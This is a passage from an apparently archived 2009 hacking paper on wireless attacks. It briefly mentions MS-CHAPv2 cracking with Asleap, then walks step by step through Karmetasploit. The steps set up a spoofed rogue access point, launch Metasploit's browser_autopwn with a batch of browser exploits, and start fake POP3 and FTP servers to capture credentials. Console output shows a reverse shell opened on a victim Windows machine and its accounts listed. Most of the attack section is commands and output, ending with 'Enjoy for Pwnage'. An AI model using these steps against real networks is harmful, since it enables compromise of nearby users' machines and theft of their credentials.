	Notice: The successful rate is up to dictionary size

	Now ASLEAP 2.2, which includes the “-C” and “-R” options to specify the hex-delimited bytes for the challenge and the response (respectively).  Using this option, Asleap becomes a generic MS-CHAPv2 cracking tool, and can be applied anytime you have a MS-CHAPv2 packet capture available.
		

##########################################
 [0x10] - Mass Exploit with Karmetasploit
##########################################

	HD Moore released some documentation (http://trac.metasploit.com/wiki/Karmetasploit) to get karmetasploit working with the framework.

	Karmetasploit can launch fake AP and exploit the client who connects to the fake AP. Hacker can log cookie, ftp, http, credential information etc 
	of the client and still also exploit the browser vulnerabilities on client machine.

	This Method was test in Backtrack3 (Final)

	1. Update Aircrack-NG
		
		$ svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng 
		$ make
		# make install

	2. Let's do our aireplay-ng test to see if things are working (Your WIFI card must support for Injection packet)

		bt# aireplay-ng -9 wlan0

		15:10:21 Trying broadcast probe requests...
		15:10:21 Injection is working!
		15:10:25 Found 5 APs

		15:10:25 Trying directed probe requests...
		15:10:26 00:1E:58:33:83:71 - channel: 2 - 'CITEC'
		15:10:35 0/30: 0%

		15:10:37 00:14:06:11:42:A2 - channel: 6 - 'WORKSHOP'
		15:10:42 0/30: 0%

		15:10:42 00:13:19:5F:D1:D0 - channel: 11 - 'VICTIM'
		15:10:48 Ping (min/avg/max): 3.325ms/126.125ms/201.281ms Power: 83.27
		15:10:48 5/30: 60%
		15:10:48 Injection is working!

		15:56:48 00:14:06:11:42:A0 - channel: 11 - 'Mywifi'
		15:56:53 0/30: 0%


	  Now It's work for Injection !!

	3. Update Metasploit

		$ svn co http://metasploit.com/svn/framework3/trunk msf3
	
	4. Download Bash script from http://www.darkoperator.com/kmsapng.tgz
		
		The script will do the following:
		- Change the MAC address of the interface
		- Set the Interface in Monitor Mode
		- Start the Karma AP with Airbase-ng
		- Change the MTU Size for the interface
		- Set the IP
		- Start the DHCPD server
		- Set in iptables a redirect of all traffic to it self so as to bypass cached DNS entries
		- Start Metasploit. 

	6. After that we run our kmsapng.sh like this:

	#./kmsapng.sh -i wlan0 -m km -s linksys
	
	Changing MAC Address
	Current MAC: 00:0f:c1:08:12:91 (Wave Corporation)
	Faked MAC:   00:40:1b:5b:b0:0b (Printer Systems Corp.)
	starting fake ap
	This will take 15 seconds ..............
	DHCPD started successfully
	Starting Packet capture to /root/kms.cap
	Starting Metasploit
	
	                                  _
	                                 | |      o
	_  _  _    _ _|_  __,   ,    _  | |  __    _|_
	/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
	  |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
	                           /|
	                           \|
	
	=[ msf v3.2-release
	+ -- --=[ 304 exploits - 124 payloads
	+ -- --=[ 18 encoders - 6 nops
	=[ 79 aux
	
	resource> load db_sqlite3
	[*] Successfully loaded plugin: db_sqlite3
	resource> db_create /root/karma.db
	[*] The specified database already exists, connecting
	[*] Successfully connected to the database
	[*] File: /root/karma.db
	resource> use auxiliary/server/browser_autopwn
	resource> setg AUTOPWN_HOST 172.16.1.207
	AUTOPWN_HOST => 172.16.1.207
	resource> setg AUTOPWN_PORT 55550
	AUTOPWN_PORT => 55550
	resource> setg AUTOPWN_URI /ads
	AUTOPWN_URI => /ads
	resource> set LHOST 172.16.1.207
	LHOST => 172.16.1.207
	resource> set LPORT 45000
	LPORT => 45000
	resource> set SRVPORT 55550
	SRVPORT => 55550
	resource> set URIPATH /ads
	URIPATH => /ads
	resource> run
	[*] Starting exploit modules on host 172.16.1.207...
	[*] Started reverse handler
	[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_compareto
	[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_compareto
	[*] Server started.
	[*] Started reverse handler
	[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_navigatorjava
	[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_navigatorjava
	[*] Server started.
	[*] Started reverse handler
	[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/firefox_queryinterface
	[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/firefox_queryinterface
	[*] Server started.
	[*] Started reverse handler
	[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/apple_quicktime_rtsp
	[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/apple_quicktime_rtsp
	[*] Server started.
	[*] Started reverse handler
	[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/novelliprint_getdriversettings
	[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/novelliprint_getdriversettings
	[*] Server started.
	[*] Started reverse handler
	[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms03_020_ie_objecttype
	[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms03_020_ie_objecttype
	[*] Server started.
	[*] Started reverse handler
	[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ie_createobject
	[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ie_createobject
	[*] Server started.
	[*] Started reverse handler
	[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_067_keyframe
	[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_067_keyframe
	[*] Server started.
	[*] Started reverse handler
	[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_071_xml_core
	[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_071_xml_core
	[*] Server started.
	[*] Started reverse handler
	[*] Server started.
	[*] Using URL: http://0.0.0.0:55550/ads
	[*] Local IP: http://127.0.0.1:55550/ads
	[*] Server started.
	[*] Auxiliary module running as background job
	resource> use auxiliary/server/capture/pop3
	resource> set SRVPORT 110
	SRVPORT => 110
	resource> set SSL false
	SSL => false
	resource> run
	[*] Server started.
	[*] Auxiliary module running as background job
	resource> use auxiliary/server/capture/pop3
	resource> set SRVPORT 995
	SRVPORT => 995
	resource> set SSL true
	SSL => true
	resource> run
	[*] Server started.
	[*] Auxiliary module running as background job
	resource> use auxiliary/server/capture/ftp
	resource> run
	[*] Server started.
	
	...
	...
	
	[*] Sending Firefox location.QueryInterface() Code Execution to 10.0.0.252:1493...
	[*] Command shell session 2 opened (10.0.0.1:45001 -> 10.0.0.252:1507)
	
	msf auxiliary(http) > sessions -i 2
	[*] Starting interaction with 2...
	
	Microsoft Windows XP [Vesion 5.1.2600]
	(C) Copyright 1985-2001 Microsoft Corp.
	
	D:\Mozilla Firefox> cd ..
	
	D:\net user
	
	User accounts for \\CWH
	
	-------------------------------------------------------------------------------
	__vmware_user__          Administrator            ASPNET
	Guest                    HelpAssistant            IUSR_CWH
	IWAM_CWH		 CWH               	  SUPPORT_388945a0
	The command completed successfully.
	
	
	Enjoy for Pwnage !!. Oops, For pentest :p
		

#####################
 [0x11] - References
#####################

[1] PaulDotCom Forum
[2] http://www.darkoperator.com/scripts
[3] http://trac.metasploit.com/wiki/Karmetasploit
[4] http://aircrack-ng.org/doku.php
[5] http://www.citec.us
[6] http://www.milw0rm.com


####################
 [0x12] - Greetz To
####################
	
Greetz	    : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK
Special Thx : asylu3, str0ke, citec.us, milw0rm.com

				----------------------------------------------------
	This paper is written for Educational purpose only. The authors are not responsible for any damage 
 originating from using this paper in wrong objective. If you want to use this knowledge with other person systems, 
				you must request for consent from system owner before
				----------------------------------------------------

# milw0rm.com [2009-02-24]